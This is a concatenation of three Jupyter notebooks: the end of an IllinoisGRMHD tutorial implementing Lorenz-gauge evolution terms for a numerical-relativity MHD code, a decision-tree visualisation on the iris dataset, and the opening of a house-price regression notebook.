}
// Next set \alpha at (i+1/2,j+1/2,k+1/2). Will come in handy when computing damping term later.
alpha_iphjphkph[index] = avg(INTERP_VARS[INTERP_LAPM1] , PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS1)+1.0;
//A_x needs a stencil s.t. interp_limits={0,1,-1,1,-1,1}:
for(int kk=MINUS1;kk<=PLUS1;kk++) for(int jj=MINUS1;jj<=PLUS1;jj++) for(int ii=PLUS0;ii<=PLUS1;ii++) {
INTERP_VARS[INTERP_AX][kk][jj][ii] = in_vars[INTERP_AX][index_arr_3DB[kk][jj][ii]]; }
//A_y needs a stencil s.t. interp_limits={-1,1,0,1,-1,1}:
for(int kk=MINUS1;kk<=PLUS1;kk++) for(int jj=PLUS0;jj<=PLUS1;jj++) for(int ii=MINUS1;ii<=PLUS1;ii++) {
INTERP_VARS[INTERP_AY][kk][jj][ii] = in_vars[INTERP_AY][index_arr_3DB[kk][jj][ii]]; }
//A_z needs a stencil s.t. interp_limits={-1,1,-1,1,0,1}:
for(int kk=PLUS0;kk<=PLUS1;kk++) for(int jj=MINUS1;jj<=PLUS1;jj++) for(int ii=MINUS1;ii<=PLUS1;ii++) {
INTERP_VARS[INTERP_AZ][kk][jj][ii] = in_vars[INTERP_AZ][index_arr_3DB[kk][jj][ii]]; }
// FIRST DO A^X TERM (interpolate to (i,j+1/2,k+1/2) )
// \alpha \sqrt{\gamma} A^x = \alpha psi^6 A^x (RHS of \partial_i psi6phi)
// Note that gupij is \tilde{\gamma}^{ij}, so we need to multiply by \psi^{-4}.
CCTK_REAL gupxx_jphkph = avg(INTERP_VARS[INTERP_GAMMATILDEUPXX], PLUS0,PLUS0, PLUS0,PLUS1, PLUS0,PLUS1);
CCTK_REAL gupxy_jphkph = avg(INTERP_VARS[INTERP_GAMMATILDEUPXY], PLUS0,PLUS0, PLUS0,PLUS1, PLUS0,PLUS1);
CCTK_REAL gupxz_jphkph = avg(INTERP_VARS[INTERP_GAMMATILDEUPXZ], PLUS0,PLUS0, PLUS0,PLUS1, PLUS0,PLUS1);
for(int kk=PLUS0;kk<=PLUS1;kk++) for(int jj=PLUS0;jj<=PLUS1;jj++) for(int ii=PLUS0;ii<=PLUS1;ii++) {
CCTK_REAL Psi2 = INTERP_VARS[INTERP_PSI][kk][jj][ii]*INTERP_VARS[INTERP_PSI][kk][jj][ii];
CCTK_REAL alpha = INTERP_VARS[INTERP_LAPM1][kk][jj][ii]+1.0;
INTERP_VARS[INTERP_LAPSE_PSI2][kk][jj][ii]=alpha*Psi2;
INTERP_VARS[INTERP_LAPSE_OVER_PSI6][kk][jj][ii]=alpha/(Psi2*Psi2*Psi2);
}
CCTK_REAL lapse_Psi2_jphkph = avg(INTERP_VARS[INTERP_LAPSE_PSI2], PLUS0,PLUS0, PLUS0,PLUS1, PLUS0,PLUS1);
CCTK_REAL A_x_jphkph = avg(INTERP_VARS[INTERP_AX], PLUS0,PLUS0, PLUS0,PLUS0, PLUS0,PLUS0); // @ (i,j+1/2,k+1/2)
CCTK_REAL A_y_jphkph = avg(INTERP_VARS[INTERP_AY],MINUS1,PLUS0, PLUS0,PLUS1, PLUS0,PLUS0); // @ (i+1/2,j,k+1/2)
CCTK_REAL A_z_jphkph = avg(INTERP_VARS[INTERP_AZ],MINUS1,PLUS0, PLUS0,PLUS0, PLUS0,PLUS1); // @ (i+1/2,j+1/2,k)
alpha_sqrtg_Ax_interp[index] = lapse_Psi2_jphkph*
( gupxx_jphkph*A_x_jphkph + gupxy_jphkph*A_y_jphkph + gupxz_jphkph*A_z_jphkph );
// DO A^Y TERM (interpolate to (i+1/2,j,k+1/2) )
// \alpha \sqrt{\gamma} A^y = \alpha psi^6 A^y (RHS of \partial_i psi6phi)
// Note that gupij is \tilde{\gamma}^{ij}, so we need to multiply by \psi^{-4}.
CCTK_REAL gupxy_iphkph = avg(INTERP_VARS[INTERP_GAMMATILDEUPXY], PLUS0,PLUS1, PLUS0,PLUS0, PLUS0,PLUS1);
CCTK_REAL gupyy_iphkph = avg(INTERP_VARS[INTERP_GAMMATILDEUPYY], PLUS0,PLUS1, PLUS0,PLUS0, PLUS0,PLUS1);
CCTK_REAL gupyz_iphkph = avg(INTERP_VARS[INTERP_GAMMATILDEUPYZ], PLUS0,PLUS1, PLUS0,PLUS0, PLUS0,PLUS1);
CCTK_REAL lapse_Psi2_iphkph = avg(INTERP_VARS[INTERP_LAPSE_PSI2], PLUS0,PLUS1, PLUS0,PLUS0, PLUS0,PLUS1);
//CCTK_REAL lapse_iphkph = avg(INTERP_VARS[INTERP_LAPM1], PLUS0,PLUS1, PLUS0,PLUS0, PLUS0,PLUS1)+1.0;
//CCTK_REAL psi_iphkph = avg(INTERP_VARS[INTERP_PSI ], PLUS0,PLUS1, PLUS0,PLUS0, PLUS0,PLUS1);
CCTK_REAL A_x_iphkph = avg(INTERP_VARS[INTERP_AX], PLUS0,PLUS1,MINUS1,PLUS0, PLUS0,PLUS0); // @ (i,j+1/2,k+1/2)
CCTK_REAL A_y_iphkph = avg(INTERP_VARS[INTERP_AY], PLUS0,PLUS0, PLUS0,PLUS0, PLUS0,PLUS0); // @ (i+1/2,j,k+1/2)
CCTK_REAL A_z_iphkph = avg(INTERP_VARS[INTERP_AZ], PLUS0,PLUS0,MINUS1,PLUS0, PLUS0,PLUS1); // @ (i+1/2,j+1/2,k)
alpha_sqrtg_Ay_interp[index] = lapse_Psi2_iphkph*
( gupxy_iphkph*A_x_iphkph + gupyy_iphkph*A_y_iphkph + gupyz_iphkph*A_z_iphkph );
// DO A^Z TERM (interpolate to (i+1/2,j+1/2,k) )
// \alpha \sqrt{\gamma} A^z = \alpha psi^6 A^z (RHS of \partial_i psi6phi)
// Note that gupij is \tilde{\gamma}^{ij}, so we need to multiply by \psi^{-4}.
CCTK_REAL gupxz_iphjph = avg(INTERP_VARS[INTERP_GAMMATILDEUPXZ], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS0);
CCTK_REAL gupyz_iphjph = avg(INTERP_VARS[INTERP_GAMMATILDEUPYZ], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS0);
CCTK_REAL gupzz_iphjph = avg(INTERP_VARS[INTERP_GAMMATILDEUPZZ], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS0);
//CCTK_REAL lapse_iphjph = avg(INTERP_VARS[INTERP_LAPM1], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS0)+1.0;
//CCTK_REAL psi_iphjph = avg(INTERP_VARS[INTERP_PSI ], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS0);
CCTK_REAL lapse_Psi2_iphjph = avg(INTERP_VARS[INTERP_LAPSE_PSI2], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS0);
CCTK_REAL A_x_iphjph = avg(INTERP_VARS[INTERP_AX], PLUS0,PLUS1, PLUS0,PLUS0,MINUS1,PLUS0); // @ (i,j+1/2,k+1/2)
CCTK_REAL A_y_iphjph = avg(INTERP_VARS[INTERP_AY], PLUS0,PLUS0, PLUS0,PLUS1,MINUS1,PLUS0); // @ (i+1/2,j,k+1/2)
CCTK_REAL A_z_iphjph = avg(INTERP_VARS[INTERP_AZ], PLUS0,PLUS0, PLUS0,PLUS0, PLUS0,PLUS0); // @ (i+1/2,j+1/2,k)
alpha_sqrtg_Az_interp[index] = lapse_Psi2_iphjph*
( gupxz_iphjph*A_x_iphjph + gupyz_iphjph*A_y_iphjph + gupzz_iphjph*A_z_iphjph );
// Next set \alpha \Phi - \beta^j A_j at (i+1/2,j+1/2,k+1/2):
// We add a "L" suffix to shifti_iphjphkph to denote "LOCAL", as we set
// shifti_iphjphkph[] gridfunction below.
CCTK_REAL shiftx_iphjphkphL = avg(INTERP_VARS[INTERP_SHIFTX], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS1);
CCTK_REAL shifty_iphjphkphL = avg(INTERP_VARS[INTERP_SHIFTY], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS1);
CCTK_REAL shiftz_iphjphkphL = avg(INTERP_VARS[INTERP_SHIFTZ], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS1);
CCTK_REAL lapse_over_Psi6_iphjphkphL = avg(INTERP_VARS[INTERP_LAPSE_OVER_PSI6], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS1);
//CCTK_REAL psi_iphjphkph = avg(INTERP_VARS[INTERP_PSI ], PLUS0,PLUS1, PLUS0,PLUS1, PLUS0,PLUS1);
//CCTK_REAL psi2_iphjphkph= psi_iphjphkph*psi_iphjphkph;
//CCTK_REAL psi6_iphjphkph= psi2_iphjphkph*psi2_iphjphkph*psi2_iphjphkph;
CCTK_REAL A_x_iphjphkph = avg(INTERP_VARS[INTERP_AX], PLUS0,PLUS1, PLUS0,PLUS0, PLUS0,PLUS0); // @ (i,j+1/2,k+1/2)
CCTK_REAL A_y_iphjphkph = avg(INTERP_VARS[INTERP_AY], PLUS0,PLUS0, PLUS0,PLUS1, PLUS0,PLUS0); // @ (i+1/2,j,k+1/2)
CCTK_REAL A_z_iphjphkph = avg(INTERP_VARS[INTERP_AZ], PLUS0,PLUS0, PLUS0,PLUS0, PLUS0,PLUS1); // @ (i+1/2,j+1/2,k)
alpha_Phi_minus_betaj_A_j_iphjphkph[index] = psi6phi[index]*lapse_over_Psi6_iphjphkphL
- (shiftx_iphjphkphL*A_x_iphjphkph + shifty_iphjphkphL*A_y_iphjphkph + shiftz_iphjphkphL*A_z_iphjphkph);
// Finally, save shifti_iphjphkph, for \partial_j \beta^j psi6phi
shiftx_iphjphkph[index]=shiftx_iphjphkphL;
shifty_iphjphkph[index]=shifty_iphjphkphL;
shiftz_iphjphkph[index]=shiftz_iphjphkphL;
}
# <a id='partial_t_a_i_gauge'></a>
#
# ### Step 1.b: Computing $\partial_{t}A_{i}^{\rm gauge}$ \[Back to [top](#toc)\]
# $$\label{partial_t_a_i_gauge}$$
#
# Now that we have access to the gridfunctions at all the necessary gridpoints, we proceed to the computation of the gauge terms in $\partial_{t}A_{i}$, i.e.
#
# $$
# \partial_{t}A_{i}^{\rm gauge} = -\partial_{i}\left(\alpha\Phi-\beta^{j}A_{j}\right)\ ,
# $$
#
# or, more explicitly:
#
# $$
# \begin{align}
# \left(\partial_{t}A_{x}^{\rm gauge}\right)_{i,j+\frac{1}{2},k+\frac{1}{2}}
# &=
# \frac{
# \left(\alpha\Phi-\beta^{j}A_{j}\right)_{i-\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} - \left(\alpha\Phi-\beta^{j}A_{j}\right)_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}}
# }{dx}\ ,\\
# \left(\partial_{t}A_{y}^{\rm gauge}\right)_{i+\frac{1}{2},j,k+\frac{1}{2}}
# &=
# \frac{
# \left(\alpha\Phi-\beta^{j}A_{j}\right)_{i+\frac{1}{2},j-\frac{1}{2},k+\frac{1}{2}} - \left(\alpha\Phi-\beta^{j}A_{j}\right)_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}}
# }{dy}\ ,\\
# \left(\partial_{t}A_{z}^{\rm gauge}\right)_{i+\frac{1}{2},j+\frac{1}{2},k}
# &=
# \frac{
# \left(\alpha\Phi-\beta^{j}A_{j}\right)_{i-\frac{1}{2},j+\frac{1}{2},k-\frac{1}{2}} - \left(\alpha\Phi-\beta^{j}A_{j}\right)_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}}
# }{dz}\ .
# \end{align}
# $$
# %%writefile -a $outdir/Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C
// This loop requires two additional ghostzones in every direction. Hence the following loop definition:
#pragma omp parallel for
for(int k=cctk_nghostzones[2];k<cctk_lsh[2]-cctk_nghostzones[2];k++) for(int j=cctk_nghostzones[1];j<cctk_lsh[1]-cctk_nghostzones[1];j++) for(int i=cctk_nghostzones[0];i<cctk_lsh[0]-cctk_nghostzones[0];i++) {
int index = CCTK_GFINDEX3D(cctkGH,i,j,k);
// \partial_t A_i = [reconstructed stuff] + [gauge stuff],
// where [gauge stuff] = -\partial_i (\alpha \Phi - \beta^j A_j)
CCTK_REAL alpha_Phi_minus_betaj_A_j_iphjphkphL = alpha_Phi_minus_betaj_A_j_iphjphkph[index];
// - partial_i -> - (A_{i} - A_{i-1})/dX = (A_{i-1} - A_{i})/dX, for Ax
Ax_rhs[index] += dXm1*(alpha_Phi_minus_betaj_A_j_iphjphkph[CCTK_GFINDEX3D(cctkGH,i-1,j,k)] - alpha_Phi_minus_betaj_A_j_iphjphkphL);
Ay_rhs[index] += dYm1*(alpha_Phi_minus_betaj_A_j_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j-1,k)] - alpha_Phi_minus_betaj_A_j_iphjphkphL);
Az_rhs[index] += dZm1*(alpha_Phi_minus_betaj_A_j_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j,k-1)] - alpha_Phi_minus_betaj_A_j_iphjphkphL);
# <a id='shift_advection_terms'></a>
#
# ### Step 1.c: Computing $\partial_{j}\beta^{j}\left[\sqrt{\gamma}\Phi\right]$ \[Back to [top](#toc)\]
# $$\label{shift_advection_terms}$$
#
# We now compute the shift-advection terms, $\partial_{j}\beta^{j}\left[\sqrt{\gamma}\Phi\right]$. For these terms we use [forwards/backwards finite difference stencils](https://en.wikipedia.org/wiki/Finite_difference_coefficient). The sign of $\beta^{i}$ determines whether we will use forwards or backwards finite difference, according to the following criterion:
#
# | $\beta^{i}$ | Finite difference |
# |:-----------:|:-----------------:|
# | $>0$ | Backward |
# | $<0$ | Forward |
#
# For example, assume $\beta^{x}<0$. Then the term which contains the derivative in the $x$-direction would read
#
# $$
# \left[\partial_{x}\beta^{x}\left(\sqrt{\gamma}\Phi\right)\right]_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} =
# \frac{
# \left[\beta^{x}\left(\sqrt{\gamma}\Phi\right)\right]_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} -
# 4\left[\beta^{x}\left(\sqrt{\gamma}\Phi\right)\right]_{i-\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} +
# 3\left[\beta^{x}\left(\sqrt{\gamma}\Phi\right)\right]_{i-\frac{3}{2},j+\frac{1}{2},k+\frac{1}{2}}
# }
# {2dx}\ .
# $$
#
# Similarly, if $\beta^{y}>0$, then the term which contains the derivative in the $y$-direction would read
#
# $$
# \left[\partial_{y}\beta^{y}\left(\sqrt{\gamma}\Phi\right)\right]_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} =
# \frac{
# -3\left[\beta^{y}\left(\sqrt{\gamma}\Phi\right)\right]_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}} +
# 4\left[\beta^{y}\left(\sqrt{\gamma}\Phi\right)\right]_{i+\frac{1}{2},j+\frac{3}{2},k+\frac{1}{2}} -
# \left[\beta^{y}\left(\sqrt{\gamma}\Phi\right)\right]_{i+\frac{1}{2},j+\frac{5}{2},k+\frac{1}{2}}
# }
# {2dy}\ .
# $$
# %%writefile -a $outdir/Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C
// \partial_t psi6phi = [shift advection term] + \partial_j (\alpha \sqrt{\gamma} A^j)
// Here we compute [shift advection term] = \partial_j (\beta^j psi6phi)
// Cache misses are likely more expensive than branch mispredictions here,
// which is why we use if() statements and array lookups inside the if()'s.
CCTK_REAL psi6phi_rhsL=0.0;
CCTK_REAL psi6phiL=psi6phi[index];
CCTK_REAL shiftx_iphjphkphL=shiftx_iphjphkph[index];
CCTK_REAL shifty_iphjphkphL=shifty_iphjphkph[index];
CCTK_REAL shiftz_iphjphkphL=shiftz_iphjphkph[index];
// \partial_x (\beta^x psi6phi) :
if(shiftx_iphjphkphL < 0.0) {
psi6phi_rhsL+=0.5*dXm1*(+ shiftx_iphjphkph[CCTK_GFINDEX3D(cctkGH,i-2,j,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i-2,j,k)]
-4.0*shiftx_iphjphkph[CCTK_GFINDEX3D(cctkGH,i-1,j,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i-1,j,k)]
+3.0*shiftx_iphjphkphL* psi6phiL);
} else {
psi6phi_rhsL+=0.5*dXm1*(- shiftx_iphjphkph[CCTK_GFINDEX3D(cctkGH,i+2,j,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i+2,j,k)]
+4.0*shiftx_iphjphkph[CCTK_GFINDEX3D(cctkGH,i+1,j,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i+1,j,k)]
-3.0*shiftx_iphjphkphL* psi6phiL);
}
// \partial_y (\beta^y psi6phi) :
if(shifty_iphjphkphL < 0.0) {
psi6phi_rhsL+=0.5*dYm1*(+ shifty_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j-2,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j-2,k)]
-4.0*shifty_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j-1,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j-1,k)]
+3.0*shifty_iphjphkphL* psi6phiL);
} else {
psi6phi_rhsL+=0.5*dYm1*(- shifty_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j+2,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j+2,k)]
+4.0*shifty_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j+1,k)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j+1,k)]
-3.0*shifty_iphjphkphL* psi6phiL);
}
// \partial_z (\beta^z psi6phi) :
if(shiftz_iphjphkphL < 0.0) {
psi6phi_rhsL+=0.5*dZm1*(+ shiftz_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j,k-2)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j,k-2)]
-4.0*shiftz_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j,k-1)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j,k-1)]
+3.0*shiftz_iphjphkphL* psi6phiL);
} else {
psi6phi_rhsL+=0.5*dZm1*(- shiftz_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j,k+2)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j,k+2)]
+4.0*shiftz_iphjphkph[CCTK_GFINDEX3D(cctkGH,i,j,k+1)]*psi6phi[CCTK_GFINDEX3D(cctkGH,i,j,k+1)]
-3.0*shiftz_iphjphkphL* psi6phiL);
}
# <a id='partial_j_alpha_psi6_aj'></a>
#
# ### Step 1.d: Computing $-\partial_{j}\left(\alpha\sqrt{\gamma}A^{j}\right)-\xi\alpha\left[\sqrt{\gamma}\Phi\right]$ \[Back to [top](#toc)\]
# $$\label{partial_j_alpha_psi6_aj}$$
#
# Now we have the simple task of computing the remaining terms on the RHS of $\partial_{t}\left[\sqrt{\gamma}\Phi\right]$. For the derivative term, $\partial_{j}\left(\alpha\sqrt{\gamma}A^{j}\right)$, we can now use ordinary centered finite differences:
#
# $$
# \begin{align}
# -\left[\partial_{j}\left(\alpha\sqrt{\gamma}A^{j}\right)\right]_{i+\frac{1}{2},j+\frac{1}{2},k+\frac{1}{2}}
# &= \frac{\left(\alpha\sqrt{\gamma}A^{x}\right)_{i,j+\frac{1}{2},k+\frac{1}{2}}-\left(\alpha\sqrt{\gamma}A^{x}\right)_{i+1,j+\frac{1}{2},k+\frac{1}{2}}}{dx} \\
# &+ \frac{\left(\alpha\sqrt{\gamma}A^{y}\right)_{i+\frac{1}{2},j,k+\frac{1}{2}}-\left(\alpha\sqrt{\gamma}A^{y}\right)_{i+\frac{1}{2},j+1,k+\frac{1}{2}}}{dy} \\
# &+ \frac{\left(\alpha\sqrt{\gamma}A^{z}\right)_{i+\frac{1}{2},j+\frac{1}{2},k}-\left(\alpha\sqrt{\gamma}A^{z}\right)_{i+\frac{1}{2},j+\frac{1}{2},k+1}}{dz}
# \end{align}
# $$
#
# The [*generalized Lorenz gauge*](https://arxiv.org/pdf/1207.3354.pdf) term, $\xi\alpha\left[\sqrt{\gamma}\Phi\right]$, is then trivially implemented.
#
# +
# %%writefile -a $outdir/Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C
// Next we add \partial_j (\alpha \sqrt{\gamma} A^j) to \partial_t psi6phi:
psi6phi_rhsL+=dXm1*(alpha_sqrtg_Ax_interp[index] - alpha_sqrtg_Ax_interp[CCTK_GFINDEX3D(cctkGH,i+1,j,k)])
+ dYm1*(alpha_sqrtg_Ay_interp[index] - alpha_sqrtg_Ay_interp[CCTK_GFINDEX3D(cctkGH,i,j+1,k)])
+ dZm1*(alpha_sqrtg_Az_interp[index] - alpha_sqrtg_Az_interp[CCTK_GFINDEX3D(cctkGH,i,j,k+1)]);
// *GENERALIZED* LORENZ GAUGE:
// Finally, add damping factor to \partial_t psi6phi
//subtract lambda * alpha psi^6 Phi
psi6phi_rhsL+=-damp_lorenz*alpha_iphjphkph[index]*psi6phiL;
psi6phi_rhs[index] = psi6phi_rhsL;
}
}
# -
# <a id='fct_avg'></a>
#
# ### Step 1.e: The `avg()` function \[Back to [top](#toc)\]
# $$\label{fct_avg}$$
#
# This is the implementation of the algorithm we discussed in [step 1.a.i](#interpolation_algorithm).
# +
# %%writefile -a $outdir/Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C
static inline CCTK_REAL avg(CCTK_REAL f[PLUS2+1][PLUS2+1][PLUS2+1],int imin,int imax, int jmin,int jmax, int kmin,int kmax) {
CCTK_REAL retval=0.0,num_in_sum=0.0;
for(int kk=kmin;kk<=kmax;kk++) for(int jj=jmin;jj<=jmax;jj++) for(int ii=imin;ii<=imax;ii++) {
retval+=f[kk][jj][ii]; num_in_sum++;
}
return retval/num_in_sum;
}
# -
# <a id='code_validation'></a>
#
# # Step 2: Code validation \[Back to [top](#toc)\]
# $$\label{code_validation}$$
#
# First we download the original `IllinoisGRMHD` source code and then compare it to the source code generated by this tutorial notebook.
# +
# # Verify if the code generated by this tutorial module
# # matches the original IllinoisGRMHD source code
# # First download the original IllinoisGRMHD source code
# import urllib
# from os import path
# original_IGM_file_url = "https://bitbucket.org/zach_etienne/wvuthorns/raw/5611b2f0b17135538c9d9d17c7da062abe0401b6/IllinoisGRMHD/src/Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C"
# original_IGM_file_name = "Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs-original.C"
# original_IGM_file_path = os.path.join(IGM_src_dir_path,original_IGM_file_name)
# # Then download the original IllinoisGRMHD source code
# # We try it here in a couple of ways in an attempt to keep
# # the code more portable
# try:
# original_IGM_file_code = urllib.request.urlopen(original_IGM_file_url).read().decode("utf-8")
# # Write down the file the original IllinoisGRMHD source code
# with open(original_IGM_file_path,"w") as file:
# file.write(original_IGM_file_code)
# except:
# try:
# original_IGM_file_code = urllib.urlopen(original_IGM_file_url).read().decode("utf-8")
# # Write down the file the original IllinoisGRMHD source code
# with open(original_IGM_file_path,"w") as file:
# file.write(original_IGM_file_code)
# except:
# # If all else fails, hope wget does the job
# # !wget -O $original_IGM_file_path $original_IGM_file_url
# # Perform validation
# # Validation__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs__C = !diff $original_IGM_file_path $outfile_path__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs__C
# if Validation__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs__C == []:
# # If the validation passes, we do not need to store the original IGM source code file
# # !rm $original_IGM_file_path
# print("Validation test for Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C: PASSED!")
# else:
# # If the validation fails, we keep the original IGM source code file
# print("Validation test for Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.C: FAILED!")
# # We also print out the difference between the code generated
# # in this tutorial module and the original IGM source code
# print("Diff:")
# for diff_line in Validation__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs__C:
# print(diff_line)
# -
# <a id='latex_pdf_output'></a>
#
# # Step 3: Output this notebook to $\LaTeX$-formatted PDF file \[Back to [top](#toc)\]
# $$\label{latex_pdf_output}$$
#
# The following code cell converts this Jupyter notebook into a proper, clickable $\LaTeX$-formatted PDF file. After the cell is successfully run, the generated PDF may be found in the root NRPy+ tutorial directory, with filename
# [Tutorial-IllinoisGRMHD__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.pdf](Tutorial-IllinoisGRMHD__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.pdf) (Note that clicking on this link may not work; you may need to open the PDF file through another means).
latex_nrpy_style_path = os.path.join(nrpy_dir_path,"latex_nrpy_style.tplx")
# #!jupyter nbconvert --to latex --template $latex_nrpy_style_path --log-level='WARN' Tutorial-IllinoisGRMHD__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.ipynb
# #!pdflatex -interaction=batchmode Tutorial-IllinoisGRMHD__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.tex
# #!pdflatex -interaction=batchmode Tutorial-IllinoisGRMHD__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.tex
# #!pdflatex -interaction=batchmode Tutorial-IllinoisGRMHD__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.tex
# !rm -f Tut*.out Tut*.aux Tut*.log
|
IllinoisGRMHD/doc/Tutorial-IllinoisGRMHD__Lorenz_psi6phi_rhs__add_gauge_terms_to_A_i_rhs.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/andresvilla86/diadx-ia-ml/blob/master/python-arboles-de-decision-002.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + id="TeK7c3uYd1Gm"
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import load_iris
from sklearn.tree import DecisionTreeClassifier, plot_tree
# Parameters
n_classes = 3
plot_colors = "ryb"
plot_step = 0.02
# Load data
iris = load_iris()
for pairidx, pair in enumerate([[0, 1], [0, 2], [0, 3],
[1, 2], [1, 3], [2, 3]]):
# We only take the two corresponding features
X = iris.data[:, pair]
y = iris.target
# Train
clf = DecisionTreeClassifier().fit(X, y)
# Plot the decision boundary
plt.subplot(2, 3, pairidx + 1)
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, plot_step),
np.arange(y_min, y_max, plot_step))
plt.tight_layout(h_pad=0.5, w_pad=0.5, pad=2.5)
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
cs = plt.contourf(xx, yy, Z, cmap=plt.cm.RdYlBu)
plt.xlabel(iris.feature_names[pair[0]])
plt.ylabel(iris.feature_names[pair[1]])
# Plot the training points
for i, color in zip(range(n_classes), plot_colors):
idx = np.where(y == i)
plt.scatter(X[idx, 0], X[idx, 1], c=color, label=iris.target_names[i],
cmap=plt.cm.RdYlBu, edgecolor='black', s=15)
plt.suptitle("Decision surface of a decision tree using paired features")
plt.legend(loc='lower right', borderpad=0, handletextpad=0)
plt.axis("tight")
plt.figure()
clf = DecisionTreeClassifier().fit(iris.data, iris.target)
plot_tree(clf, filled=True)
plt.show()
|
python-arboles-de-decision-002.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [conda env:573]
# language: python
# name: conda-env-573-py
# ---
# +
import pandas as pd
# classifiers / models
from sklearn.linear_model import LinearRegression, LogisticRegression, Ridge, RidgeCV
# other
from sklearn.metrics import accuracy_score, log_loss, make_scorer, mean_squared_error
from sklearn.model_selection import (
GridSearchCV,
RandomizedSearchCV,
ShuffleSplit,
cross_val_score,
cross_validate,
train_test_split,
)
# -
X_train = pd.read_csv('data/X_train.csv')
X_valid = pd.read_csv('data/X_valid.csv')
y_train = pd.read_csv('data/y_train.csv')
y_valid = pd.read_csv('data/y_valid.csv')
X_train
# +
cat_cols = ['MSSubClass', 'MSZoning', 'Street', 'Alley', 'LotShape', # possibly add LotShape,Landslope to ord
'LandContour', 'Utilities', 'LotConfig', 'LandSlope', 'Neighborhood',
'Condition1', 'Condition2', 'BldgType', 'HouseStyle', 'RoofStyle',
'RoofMatl', 'Exterior1st', 'Exterior2nd', 'MasVnrType', 'Foundation',
'Heating', 'Electrical', 'Fireplaces', 'GarageType', 'GarageFinish',
'PavedDrive', 'MiscFeature','BsmtQual','GarageQual', 'GarageCond',
'BsmtCond','BsmtExposure', 'BsmtFinType1', 'BsmtFinType2','PoolQC', 'Fence',]
num_cols = ['LotFrontage', 'LotArea', 'YearBuilt', 'YearRemodAdd', 'MasVnrArea',
'BsmtFinSF1', 'BsmtFinSF1', 'BsmtUnfSF', 'TotalBsmtSF', '1stFlrSF', '2ndFlrSF',
'LowQualFinSF', 'GrLivArea', 'BsmtFullBath', 'BsmtHalfBath', 'FullBath',
'HalfBath', 'BedroomAbvGr', 'KitchenAbvGr', 'TotRmsAbvGrd', 'GarageYrBlt','GarageCars',
'GarageArea', 'WoodDeckSF', 'OpenPorchSF', 'EnclosedPorch', '3SsnPorch',
'ScreenPorch', 'PoolArea', 'MiscVal', 'MoSold', 'YrSold', ]
